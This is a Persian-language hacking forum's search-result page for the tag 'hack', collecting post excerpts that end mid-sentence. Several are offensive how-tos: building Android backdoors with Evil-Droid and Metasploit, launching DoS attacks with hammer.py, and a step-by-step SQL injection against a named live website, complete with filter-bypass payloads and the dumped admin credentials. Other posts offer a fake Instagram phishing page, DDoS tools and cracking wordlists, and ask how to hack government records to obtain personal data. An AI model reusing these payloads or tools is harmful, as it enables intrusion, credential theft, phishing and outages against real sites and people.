سرور دیسکورد گاردایران
جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'هک'.
149 نتیجه پیدا شد
-
سلام چند وقت پیش @Zubeid اینو گذاشت ولی خطا میداد ولی این بدون باگش: wifipass.py
-
- 11
-
-
-
- اسکریپت پیدا کردن رمز وای فای
- پیدا کردن رمز wifi
- (و 7 مورد دیگر)
-
بسم الله الرحمن الرحیم سلام معذرت میخوام که این پست اسپم هست ولی ابزار خیلی خوبی هست امروز میخوام یک ابزار واسه ساختن بکدور اندروید معرفی کنم پیش نیاز ها و وابستگی های این ابزار 1 - metasploit-framework 2 - xterm 3 - Zenity 4 - Aapt 5 - Apktool 6 - Zipalign وقتی مطمان شدید که تمام این ها نصب هستند میتونید کامل از این ابزار بهرهمند شوید (متاسپلویت هم خودش کافی هست) خب لینک github رو واستون میزارم تا ازش بهرمند شوید https://github.com/M4sc3r4n0/Evil-Droid خب اینم لینک دانلودش برای نصب کامل دستورات زیر را به ترتیب وارد کنید ------------------- sudo apt update sudo apt upgrade git clone https://github.com/M4sc3r4n0/Evil-Droid ----------------------------- خب برای اجرای این ابزار وارد فولدرش بشید و بقیه دستورات رو وارد کنید ---------------------------- cd Evil-Droid chmod +x * ./evil-droid '---------------''---------- ابزار شروع به کار کردن میکنه و شما با نوشتن عدد 3 میتونید فایل apk(backdoor) رو درست کنید نصب کاملا گرافیکی هست و فقط شما نوع پیلود و اسم و جای نصبش رو مشخص میکنیم و خودکار وارد متاسپلویت میشه و منتظر نصب شدن بکدور هست وقتی بکدور نصب شد خودکار دسترسی meterpreter میگیرید. --------------------------- آموزش ویدیویی در یوتیوب https://m.youtube.com/watch?v=6YdSTzBK8N4 -------------------------- سربلند و پیروز باشید.
-
ابزار تست نفوذ ابزار های تست نفوذ وب |Web Penetration testing tools
1TED یک موضوع را ارسال کرد در ابزارهای امنیتی
به نام خدا سلام و درود خدمت گارد ایرانی های حرفه ای عزیز ../ تصمیم گرفتم یک تاپیک جامع و کامل درباره ابزار های تست نفوذ وب و تحلیلگر های آسیب پذیری که اکثرا به صورت منبع باز (Open Source) هستند. ابزار هایی که براتون قرار میدم به سیستم عامل کالی لینوکس ارجاء داده میشن ولی منطقا فقط برای همون سیستم عامل نیست ! خب همونطور که میدونید مرحله اول در پروسه نفوذ و تست امنیت وب , جمع آوری اطلاعات در باره وبسایت هدف میباشد برای همین بیاین از صفر شروع کنیم 😉 شناسایی فریمورک و یا سیستم مدیریت محتوای تارگت (CMS & Framwork Identification) : AngelSword یا کلمات فرشتگان خب خب خب ... ظاهرا بازم چینیا گل کاشتن 😕 یک ابزار چینی به زبان پایتون جهت بررسی چهارچوب یک وبسایت و آنالیز آسیب پذیری های پابلیک ( عمومی ) . یکسری فریمورک ها به صورت تعریف شده در این اسکریپت قرار داده شده که سرعت کار شمارو تو انجام فراید اسکن منطفا بسیار زیاد میکنه . WhatWeb یا معادل فارسیش که یکم بد میشه , چی وب 😐 یک ابزار جذاب که به ادعای مولف نسل بعدی اسکنر وب خواهد بود . به زبان روبی (Ruby) نوشته شده و بیش از 1800 ابزار و افزونه در اختیار شما قرار داده که اسکن شمارو بسیار حرفه ای تر میکنه . برای دریافت اطلاعات بیشتر راجب این ابزار بینظیر میتونید از گیت هابش که براتون روی عنوان همین بخش لینک کردم استفاده کنید . Wappalyzer یا وَپلایزِر ! هم به صورت افزونه هم به صورت نرم افزار برای نصب میتونید ازش استفاده کنید . جالبه که بدونید کل پروژه وپلایزر بر پایه جاوا اسکریپت و بیشتر روی فریمورک Node.Js هست و همین موضوع باعث میشه این ابزار Cross-platform یا مستقل از پلتفرم باشه و روی هر سیستم عامل قابل استفاده باشه . کار جذابی که برای شما انجام میده اینه که چهارچوب کلی وبسایت و فناوری و امکاناتی که ازش استفاده کرده تا شما وبسایت رو مشاهده کنید رو نشون میده . مثلا زبان برنامه نویسی استفاده شده . نوع وب سرویس , CMS مورد استفاده و... Whatruns یا معادل فارسیش که میشه , چه اجرا میشود !؟ یک ابزار نو پا تر نسبت به وپلایزر تو مایه های همون وپلایزر که تو بخش قبلی بهش اشاره کردیم هست که همون کار رو انجام میده با امکانات کامل تر . این ابزار به صورت افزونه فقط ارائه میشه و فقط مختص مرورگر گوگل کروم هست . WhatCMS یا وات سی ام اس ! شناسایی و نفوذ با این ابزار ! جالبه که بدونید یک ابزار کاملا آنلاین هست و جهت استفاده از نرم افزار باید یک API از وبسایتش دریافت کنید . قابلیت شناسایی 330 نوع سیستم مدیریت محتوا و بررسی امنیتی و سپس پیشنهاد ابزار لازم جهت نفوذ ! بی نظیره CMSeeK یا جست و جو کننده CMS یک ابزار پیشرفته به زبان پایتون که برای شناسایی و بهره برداری آسیب پذیری ها روی CMS های معروف استفاده میشه این ابزار میتونه بیش از 180 سیستم مدیریت محتوا رو پشتیبانی کنه! ابزار های آنلاین برای جمع آوری اطلاعات : Yunsee یا یون سی ( که من بهش میگم یونس :|) Bugscaner یا باگ اسکنر ! WhatCMS ONLINE ( وبسایت همون ابزاری که راجبش حرف زدیم ) TScan یا تی اسکن TideFinger یا انگشت جزر و مدی ! 😕 فکر میکنم تا اینجای کار با ابزار های جمع آوری اطلاعات وبسایت اطلاعات خوبی دریافت کرده باشید . پس تا قرار گرفتن پست بعدی لطفا چیزی ارسال نکنید که قالب کلی تاپیک به هم نخوره ❤️ با لایک هاتون انرژی بدید و تاپیک رو شیر کنید و چنل مارو تو یوتیوب سابسکرایب کنید 🤣 ... اگه حمایت ها خوب باشن آموزش کار با تک تکشون هم میزاریم سپاس ../- 2 پاسخ
-
- 9
-
-
-
- آسیب پذیزی
- تست امنیت
- (و 11 مورد دیگر)
-
سلام من مطلبی دیدم تحت عنوان ماین کردن ارزدیجیتال مثل اتریوم با استفاده از سی پی یو قربانی!!! بعد از نفوذ به سیستم اش, ولی اموزشش رو توی اینترنت پیدا نکردم البته یه اموزش مختصری بود در باره اسیب پذیری محصولات mikrotik و با این اسیب پذیری دسترسی میگرفت و ماین میکرد برای کامپیوتر ها(pc) هم میشه این کارو کرد؟ یعنی بعد از نفوذ با cpu اون ماین کرد اگه میشه اموزشش رو قرار بدید چون روی اینترنت من پیدا نکردم ممنون
- 2 پاسخ
-
- 1
-
-
- metasploit
- سوال
- (و 7 مورد دیگر)
-
با سلام خدمت دوستان عزیز توی این ویدئو ۵ نکته جالب در رابطه با دیفیس رو گفتیم و به دوستانی که به دیفیس علاقه دارن خیلی پیشنهاد میکنم 😁 لینک در یوتیوب لینک در آپارات
-
- 10
-
-
-
- sql injection
- دیفیس
- (و 9 مورد دیگر)
-
سلا م . ظهرتون بدون باگ . امروز میخوام درباره حمله داس و دیداس صحبت کنم این دو حمله یکی از معروف ترین حمله های سایبری بین هکر ها هستش . خوب حالا این دوتا اتک چی هستن و چه کاری انجام میدن ؟ این اتک ها هدفشون در اصل خارج کردن سرویس دهی اون میزبان به کاربران هست تا کابران نتونن با اون سایت کار کنن و کاراشون انجام بدن -- توضیح -- در این اتک هکر با ارسال درخواست های مکرر به سرور و یا کامپیوتر باعث اختلال سرور یا کامپیوتر می شوند ... خب در حمله اول که به اسم داس هستش یک کامپیوتر به یک سرور یا کامپیوتر درخواست هارو ارسال میکنه و باعث اختلال میشه (در این حمله تاثیری زیادی بر سرور نمیزاره و برا تارگت های خیلی کوچیک خوبه مثل مودم ها و روتر و..) در حمله دوم دیداس چند کامپیوتر به یک سرور خیلی بزرگ حمله میکنند و درخواست های زیادی از پورت های مختلفی به سرور می فرستند تا اون سرور از کار بیفته . در حمله دیداس خیلی قوی تر هستش و کامپیوتر های بیشتر در این حمله هستن شاید بیشتر بالای ۱۰۰ ۲۰۰ نفر آدم و خیلی خیلی بیشتر در این حمله ها سرور اف می شود و حتی در بعضی اوقات باعث صدمات فیزیکی به سرور هم می شوند .. آموزش اتک داس در کالی لینوکس : ابزار مورد نیاز : 1-nslookup 2-python3 3-hammer.py برای نصب این سه ابزار میتواند با استفاده از apt-get یا apt در کالی لینوکس ان هارا دریافت کنید به جز hammer.py نصب کردید ؟ بریم برای آموزش .. خب اول از همه باید ایپی سایت رو در بیاریم با nslookup که این نیاز به روت نداره ولی کسایی که همیشه تو روت هستن هم میتونن ازش استفاده کنن خب .. برا بدست اوردن ایپی nslookup رو مینویسم و در جلو اون سایت مورد نظر رو مینویسم و در قسمت Address ایپی مورد نظر سایتمون هستش .. بعد از اون اسکریپت اتک رو از سایت GitHub دانلود میکنیم از طریق git clone در ترمینال لینک دانلود : hammer.py بعد از دانلود اسکریپت . پوشه اسکرپیت رو با cd ha,mmer انتخاب میکنیم . بعد از اون با کد python3 hammer.py -s ip -p -t اتک رو شروع میکنیم در قسمت < ip > ایپی مورد نظرمون رو وارد میکنیم بعد از p- پورتی که اتک میخوایم رو بدیم میزاریم ( پورت دیفالت خودش ۸۰ هست ) و بعد از t- سرعت اتک رو وارد میکنیم ( سرعت دیفالت خودش ۱۳۵ هست) و بعد از وارد کردن همه اینا اتک شروع میشه و در اتمام کیل شدن رو مینویسه و به معنی اتمام هستش . خوش و خرم باشید . از این مطاب در راه درستش استفاده کنیم به امید قویتر شدن ایران در امنیت سایبری ( با اینکه خودش در حال حاضر قویترینه) خدانگهدار
-
𝕚𝕟 𝕥𝕙𝕖 𝕟𝕒𝕞𝕖 𝕠𝕗 𝕘𝕠𝕕 با سلام و احترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک آموزش Html,Css را قرار خواهم داد ودر در دوره های بعدی با html5,css3 و جی کوئری ، بوت استرپ 4 ، پایگاه داده mysql و زبان برنامه نویسی php آشنا خواهید شد پس لطفا در تاپیک ها اسپم وارد نکنید و برای ادامه آموزش ها تاپیک ها را بپسندید
- 8 پاسخ
-
- 10
-
-
-
- برنامه نویسی تحت وب
- ساخت وب سایت
- (و 19 مورد دیگر)
-
به نام خدا شب گذشته اکانت شاخ مجازی و دزد پول مردم بار دیگر هک شد به وسیله ی شخصی به نام mr__nking موفق باشید
-
sql injection آموزش آسیب پذیری Sql Injection (ویدئویی)
MR.MSA یک موضوع را ارسال کرد در تارگت های تمرینی
با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم : لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .- 43 پاسخ
-
- 21
-
-
-
- اموزش هک سایت با sqli
- اموزش دسترسی به دیتابیس
- (و 55 مورد دیگر)
-
آموزش کامل فایروال Pfsense با سلام از اونجایی که وقت تایپ زیاد ندارم این که این فایر وال چی هست و .. رو ارجاع میدم به منابع دیگه و میریم سراغ آموزش چند نکته که باید بگم ۱. این فایر وال نیاز به یک سخت افزار قوی نداره پس برای استفاده در خانه هم مفید هست ۲. آموزش رایگان این فایروال رو من در سایت های ایرانی ندیدم ۳. شرکت های بزرگی مثل اپل از این فایروال استفاده میکنند ۴. در این تایپیک اسپم ممنوع و سوالات خود را در تایپیک جدا مطرح کنید ۵. از صبر شما مچکرم ۶. برای تشکر از دکمه تشکر اسفاده کنید ----------------------------------------------------------------------------------------------------------------------------------------------------------------- Pfsense چیست؟ Pfsense یک فایروال نرم افزاری opensource می باشد که بر پایه FreeBSD ساخته شده. میتوانید از آن به عنوان یک فایروال/ روتر استفاده نمایید و روتر اختصاصی شبکه خود را داشته باشید. در رابطه با تاریخچه ایجاد pfsense، پروژه pfsense در سال 2004 آغاز شد و اولین انتشار آن در سال 2006 بود. ویژگی های pfsense :می توانید برای فیلتر کردن IP های مبدا و مقصد بسته ها و همچنین پورت های udp و tcp از آن استفاده کنید محدود کردن تعداد connection ها بر اساس rule ها مختلف ابزار های رمز نگاری پیشرفته برای سیستم عامل و شبکه مسدود سازی و اعمال محدودیت برای سرور ها و سیستم ها بر اساس نوع سیستم عامل (برای مثال اگر بخواهید سرور های لینوکسی به اینترنت دسترسی داشته باشند و سرور های ویندوزی دسترسی به اینترنت نداشته باشد بر اساس نوع سیستم عامل می توانید برای آنها اعلام وضعیت کنید ) می توانید ترافیک ها را بر اساس نوع آنها مدیریت نمایید و برای آن ها محدودیت قاعل شوید قابلیت نرمالسازی ترافیک را دارید می توانید قابلیت فیلترینگ را به صورت کامل خاموش نمایید تا سرور شما به یک روتر ساده تبدیل شود قابلیت فیلترینگ برای لایه 2 و لایه 3 در pfsense وجود دارد می توانید حتی در لایه application نیز محدودیت هایی برای کاربران قرار دهید وجود سیستم nating برای انجام nat در pfsense قابلیت پیکربندی همزمان دو فایروال در شبکه را داراست و امکان استفاده از HA یا همان قابلیت دسترسی بالا وجود دارد. به این صورت که هر دو فایروال به صورت خودکار قابلیت تعامل با یکدیگر را دارند و در صورت از دسترس خارج شدن یکی از آنها دیگری می تواند خدمات ارائه دهد می توانید از pfsense به عنوان یک سرور مانیتورینگ برای سخت افزار و وضعیت بسته ها نیز استفاده نمایید منبع : server.ir
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت شما کاربران محترم تیم انجمن گاردایران در این تاپیک یک ویدئو از باتی که برای گیم پلی 𝐢𝐧𝐯𝐨𝐤𝐞𝐫 قرار دادم دوتا بازا میدونن کار با این هیرو چقدر سخت هستش و برای انجام شدن یک اسپل چند کلید رو باید باهم بزنید نحوه ی عملکرد بات رو به صورت ویدئو قرار خواهم داد برای آموزش اختصاصی ویروس نویسی با من در ارتباط باشید از دادن اسپم در این تاپیک خودداری کنید Untitled.mp4
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران در این تاپیک قصد دارم تارگت با نکات خاص رو خدمتتون آموزش بدم ولی قبلش باید یادآوری کنم که این آموزش ها فقط برای آشنایی و یادگیری شماست هر گونه استفاده ی غیرمجاز به عهده ی خود شماست ! در ضمن دوستان عزیزی که به ضمینه ی هک و امنیت علاقه مند هستند میتوانند این آموزش هارو دنبال کنند و با مراجعه به تاپیک های قبلی بنده میتونید این آموزش رو از اول یاد بگیرید چون در اینجا فقط به نکات اشاره خواهد شد نکته : هک ر شدن بچه بازی نیست که بخوای برای آسیب رسوندن به دیگران یا تفریح یادبگیری اگر اهدافت برای یادگیری هک اینه همین الان میتونی اینجارو ترک کنی تارگت : https://www.nitrogenium.co.in/features-product.php?id=45 با قرار دادن ' آسیب پذیری مشخص خواهد شد https://www.nitrogenium.co.in/features-product.php?id=45' حال به سراغ دستورات بعدی برای پیدا کردن ستون های سایت میرویم با استفاده از دستور https://www.nitrogenium.co.in/features-product.php?id=45 order by 99999-- بسیار خب میبینیم که به کلمه ی order حساس هستش پس بایپس کلمه ی order رو قرار میدیم -> group https://www.nitrogenium.co.in/features-product.php?id=45 group by 99999-- صفحه load میشود در صورتی که نباید load َود چون هیچ سایتی انقدر ستون ندارد پس بایپسشو قرار میدیم https://www.nitrogenium.co.in/features-product.php?id=45' group by 99999--+ انقدر اعداد رو کم میکنیم تا صفحه load شود به 25 خواهیم رسید بدین صورت https://www.nitrogenium.co.in/features-product.php?id=45' group by 25--+ حال باید دستورات بعدی برای بیرون کشیدن database اعمال کنیم برای راحتی کارشما که شاید برنامه Hackbar روی مرورگرتون نصب نباشه لیست اعداد رو تهیه کردم که بتونید راحت جای گذاری کنید union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 خب دستورات رو وارد میکنیم بدین شکل https://www.nitrogenium.co.in/features-product.php?id=45' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ ولی با یک Error معروف رو به رو خواهیم شد پس با دستور /*!00000union*/ بایپس میکنیم https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--+ خب حالا میریم سراغ بیرون کشیدن table های سایت https://www.nitrogenium.co.in/features-product.php?id=-45' /*!00000union*/ select 1,2,3,4,5,6,group_concat(table_name,0x3c62723e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--+ میبینیم که دوباره با Error معروف Not Acceptable! مواجه خواهیم شد خیلی راحت با دستوراتی که خدمتتون عرض کردم بایپس کنید بدین شکل https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(table_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.tables*/+/*!00000where*/+table_schema=database()--+ سایتی رو معرفی میکنم که برای hex کردن متن کمکتون میکنه Text To Hex بسیار خب میریم سراغ دستورات بعدی شروع به hex کردن admin_log میکنیم و در دستور قرار میدیم (اگر با دستورات آشنا نیستی موضوعات قبلی تاپیک های بنده رو ببین ) https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(column_name,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+/*!00000information_schema.columns*/+/*!00000where*/+table_name=0x61646d696e5f6c6f67--+ و دستور بعد برای استخراج داده https://www.nitrogenium.co.in/features-product.php?id=-45%27%20/*!00000union*/%20select%201,2,3,4,5,6,/*!00000group_concat(uid,0x3a,upass,0x3c62723e)*/,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*!00000from*/+admin_log--+ دوستان عزیز لطفا از آموزش ها سو استفاده نکنید این آموزش ها فقط برای یادگیری شماست پس لطفا کسی رو دیفیس نکنید سعی میکنم هر روز یک تاپیک در مورد تارگت با نکات خاص قرار بدم لطفا در اینجا اسپم نکنید برای ادامه ی آموزش ها فقط تاپیک را بپسندید موفق باشید admin11:admin11 username & password
- 2 پاسخ
-
- 12
-
-
-
- sqlinjection
- sql
- (و 17 مورد دیگر)
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران دوستانی که چندین اکانت میسازن و پست های خودشون رو میپسندند باید این رو هم در نظر داشته باشید که مدیران سایت چک خواهند کرد و اکانت شما مسدود خواهد شد !
-
- 6
-
-
-
- مسدودیت شدن اکانت
- ممنوع بودن چندین اکانت
- (و 10 مورد دیگر)
-
سلام👋 اینجا میخواهم به شما آموزش نصب کالی لینوکس در اندروید را بدهم پس گوشیتون را آماده کنید! من دو روش نصب با روت و بدون روت به شما آموزش خواهم داد. نکته: با روت کردن گوشی از خدمات گوگل پلی محروم خواهید شد به همین دلیل لینک دانلود نرم افزار ها از مایکت تهیه شده است. با روت: ابتدا شما باید نرم افزار ترموکس(دانلود از مایکت) دانلود و نصب کنید. سپس نرم افزار Anlinux(دانلود از مایکت) را دانلود و نصب کنید. نرم افزار anlinux را باز کنید و گزینه dashboard را انتخاب کنید، کاربرد و راه استفاده صحیح از گزینه های دیگر را بعد از نصب کالی لینوکس به شما توضیح خواهم داد. گزینه اول choose را انتخاب کنید(برای شما چندین سیستم عامل می آید که شما kali را انتخاب کنید)، سپس روی copy برای کپی دستورات نصب، کلیک کنید، سپس روی launch کلیک کنید. اگر نرم افزار ترموکس را نصب کرده باشید برای شما نرم افزار ترموکس باز خواهد شد سپس انگشت مبارکتان را روی صفحه نگه دارید تا گزینه paste برای شما ظاهر شود، روی آن کلیک کنید و enter را بزنید. بستگی به سرعت اینترنت شما دارد که چقدر طول بکشد.حجم آن تقریبا ۷۱ مگابایت است. پس از اتمام نصب با دستور زیر آن را اجرا کنید: ./start-kali.sh اگر برای شما root@localhost#~$ ظاهر شد تبریک میگویم کالی لینوکس ورژن 2020.3 با موفقیت برای شما نصب شده است. حالا...میرسیم به آن گزینه هایی که برای ما هنگام باز کردن نرم افزار anlinux ظاهر شدند. توجه! توجه! توجه!: برای اجرای صحیح این دستورات باید حتما سیستم عامل کالی را فعال کنید سپس در سیستم عامل کالی آن ها را اجرا کنید. خب، اگر دقت کنید سیستم عامل ما رابط گرافیکی ندارد، و برای اجرای نرم افزار هایی همچون Firefox به مشکل بر خواهید خورد. پس ما از یکی از آن گزینه ها به اسم Desktop environment را انتخاب میکنیم، سپس روی گزینه CHOOSE (اولی) کلیک میکنیم و سیستم عامل kali را انتخاب میکنیم در گزینه CHOOSE (دومی) شما حق انتخاب دارید اگر رابط گرافیکی زیبایی میخواهید MATE را انتخاب کنید یا اگر حافظه گوشی شما کم است گزینه Xfce4 را انتخاب کنید، سپس COPY را انتخاب کنید و روی LAUNCH کلیک کنید. یادآوری: سیستم عامل کالی را فعال کنید سپس دستور مورد نظر را اجرا کنید. توجه کنید که در حین نصب از شما یک رمز میخواهد. پس از نصب رابط گرافیکی بدون ارور و کامل شما باید نرم افزار Vnc viewer( دانلود از مایکت) را نصب کنید، سپس ان را اجرا کنید بعد از اجرا، یک کانکشن جدید درست کنید و روی 127.0.0.1:5901 تنظیم کنید سپس کانکت کنید و آن رمزی که از شما خواست را به آن بدهید. شما الان در محیط کاری لینوکس هستید!! توجه کنید که اگر ترموکس را به طور کامل ببندید دیگر نخواهید بود با vnc viewer متصل شوید پس کالی لینوکس را فعال کنید و دو دستور زیر را در آن به ترتیب اجرا کنید: vncserver-stop vncserver-start بدون روت: برای نصب کالی لینوکس بدون روت با پایداری بالا در اندروید شما باید نرم افزار userland(دانلود از مایکت) را نصب کنید سپس نرم افزار userland را باز کنید و منتظر باشید سیستم عامل های قابل نصب برای شما لود شود. بعد هم روی سیستم عامل Kali کلیک کنید،یک نام کاربری و رمز عبور انتخاب کنید و روی ادامه کلیک کنید، منتظر دانلود کامل و آماده سازی فایل ها بمانید. اگر نرم افزار vnc viewer را نصب کرده باشید وارد آن میشوید و رمزی که انتخاب کردید را وارد میکنید و از کالی لینوکس لذت ببرید. برای شما تمامی لینک های دانلود نرم افزار ها از مایکت را قرار داده ام. امیدوارم که لذت برده باشید، لایک فراموش نشه، موفق و پیروز باشید. untitled.txt
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت دوستان عزیز تیم انجمن گاردایران در این تاپیک چند نمونه پسوردلیست واستون آماده کردم که در زمینه ی کرک بسیار مهم و رایج هستند پسورد ------------------>>>>>>>>>>> guardiran.org Wordlists&Password.rar
-
- 7
-
-
-
- password
- passwordlist
- (و 13 مورد دیگر)
-
سلام خدمت دوستان عزیز در این پست چند برنامه DDoS قرار دادم و یک فایل سورس که میتونید خیلی راحت کامپایل کنید و نحوه ی کد نویسی رو ببینید که خودتون این نوع حملات رو بنویسید با تشکر💖 Mr_Zero Desktop.zip source code.zip
-
با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای قرار دادن یسری کتاب مفید در زمینه تست نفوذ و هک و امنیت قرار داده شده . امیدوارم نظرتونو جلب کنه 😊😊 اولین کتاب 1- کتاب خودکار سازی فرآیند ها با سی شارپ (تست نفوذ کلاه خاکستری با سی شارپ ) C#.Net GrayHat_C#.pdf
- 1 پاسخ
-
- 6
-
-
- کتابهای تست نفوذ
- کتاب هک
- (و 7 مورد دیگر)
-
آموزش تصویری آموزش تصویری دوره کامل تست نفوذ با زیرنویس فارسی
mownten یک موضوع را ارسال کرد در آموزش های تصویری
با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست. -
سلام خدمت دوستای عزیزم تو گارد ایران امید وارم که حالتون خوب باشه در این بخش با اجازه مدیران بخش عزیز اکشن ها قرار میگیرند نحوه استفاده اکشن همین امشب در همین بخش بارگزاری خواهد شد انشاا... که استفاده کنید ! قوانین بخش ! 1-اکشن همراه با دمو ارسال شود ! 2- پسورد همه فایل ها guardiran.org باید باشد 3-ارسال اسپم ممنوع 4-سوالا در بخش سوالات و پیشنهادات در بخش پیشنهادات ! یا حـ ـق ../
- 5 پاسخ
-
- 6
-
-
- مجموعه اکشن
- بانک اکشن
- (و 8 مورد دیگر)
-
من هیچ تجربه ای تو نه هک و نه برنامه نویسی ندارم سوالی که از دوستان دارم اینکه میشه از طریق وای فای یه سیستم رو هک کرد؟ مثلا توی خدماتی نشستی یه مودم اونجا نصب کنی و هر کدوم از اون کارمندا وصل بشن بهش تو از اون طریق سیستمش رو هک کنی؟ البته اینو از تو فیلم دیدم ولی احتمالا ممکنه کسی میدونه یه توضیح بده
-
اساتید و دوستان خبره بنظرتون میشه به اطلاعات محرمانه و شخصی افراد با داشتن یه سری اطلاعات جزیی دست پیدا کرد!؟ 1. مثلا تمام ثبت احوال دسترسی کامل به اطلاعات شخصیمون دارن 2. تمام مخابرات و خدماتی ها با داشتن شماره و یا کدملی میتونن به اطلاعات ما دست پیدا کنن 3. یا کلانتری ها یا دادگستری و.. میتونن سابقه مارو پیدا کنن و سوال اینه ایا میشه و چجوری میشه این مکان هارو هک کرد تا بشه به اطلاعات شخصی افراد با داشتن شمارشون. کدملیشون. و... دست پیدا کرد!!!؟- 1 پاسخ
-
- 1
-
-
- اطلاعات شخصی
- اطلاعات
- (و 2 مورد دیگر)
-
با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
-
- 6
-
-
-
- آموزش تصویری
- ddos
- (و 14 مورد دیگر)
-
با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip
-
با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در 